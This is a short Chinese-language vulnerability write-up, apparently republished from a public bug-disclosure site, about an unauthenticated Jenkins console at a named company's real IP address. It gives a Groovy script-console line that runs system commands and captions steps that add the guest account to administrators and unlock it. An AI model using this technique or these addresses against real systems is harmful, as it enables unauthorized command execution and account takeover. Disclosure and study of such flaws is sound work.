【漏洞学习——未授权访问】慧聪网Jenkins系统未授权访问

漏洞细节

http://58.252.73.136:8007/ (慧聪网询盘宝反馈活动)
http://58.252.73.136:8001/login.aspx (慧聪家电城CRM系统)
http://58.252.73.136:8080(jenkins管理后台,免密码访问)
http://58.252.73.136:8080/script下执行cmd命令

println "ipconfig".execute().text

【漏洞学习——未授权访问】慧聪网Jenkins系统未授权访问_第1张图片

 

当前权限

【漏洞学习——未授权访问】慧聪网Jenkins系统未授权访问_第2张图片

查看用户

【漏洞学习——未授权访问】慧聪网Jenkins系统未授权访问_第3张图片

添加guest到administrators组

【漏洞学习——未授权访问】慧聪网Jenkins系统未授权访问_第4张图片

解锁guest用户

【漏洞学习——未授权访问】慧聪网Jenkins系统未授权访问_第5张图片

ping 114.114.114.114

【漏洞学习——未授权访问】慧聪网Jenkins系统未授权访问_第6张图片

 

参见:https://bugs.shuimugan.com/bug/view?bug_no=171517

 

 

你可能感兴趣的:(【渗透测试实战1】)